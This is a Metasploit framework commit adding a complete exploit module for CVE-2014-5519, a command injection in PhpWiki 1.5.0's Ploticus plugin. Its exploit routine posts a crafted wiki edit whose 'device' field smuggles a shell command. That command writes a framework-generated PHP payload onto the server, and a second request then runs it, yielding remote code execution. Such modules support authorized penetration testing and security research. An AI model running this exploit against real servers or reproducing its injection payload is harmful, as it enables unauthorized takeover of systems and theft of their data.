Land rapid7#3799 - Add CVE-2014-5519: phpwiki/ploticus RCE

Author: wchen-r7

modules/exploits/multi/http/phpwiki_ploticus_exec.rb

@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Phpwiki Ploticus Remote Code Execution',
+      'Description'    => %q{
+        The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary
+        code via command injection.
+      },
+      'Author'         =>
+        [
+          'Benjamin Harris',              # Discovery and POC
+          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-5519' ],
+          [ 'OSVDB', '110576' ],
+          [ 'EDB', '34451'],
+          [ 'URL', 'https://sourceforge.net/p/phpwiki/code/8974/?page=1' ], # This commit prevents exploitation
+          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/77' ] # The day the vuln went public
+        ],
+      'Payload'	       =>
+        {
+          'BadChars'   => "\x00",
+        },
+      'Platform'       => 'php',
+      'Arch'		       => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 11 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The full URI path to phpwiki', '/phpwiki']) ,
+      ], self.class)
+  end
+
+  def exploit
+    uri =  target_uri.path
+
+    payload_name = "#{rand_text_alpha(8)}.php"
+    php_payload = get_write_exec_payload(:unlink_self=>true)
+
+    res = send_request_cgi({
+      'uri'      => normalize_uri(uri + '/index.php/HeIp'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'pagename'      => 'HeIp',
+        'edit[content]' => "<<Ploticus device=\";echo '#{php_payload}' > #{payload_name};\" -prefab= -csmap= data= alt= help= >>",
+        'edit[preview]' => 'Preview',
+        'action'        => 'edit'
+      }
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    upload_uri = normalize_uri(uri + "/" + payload_name)
+    print_status("#{peer} - Executing payload #{payload_name}")
+    send_request_raw({
+      'uri'    => upload_uri,
+      'method' => 'GET'
+    })
+  end
+end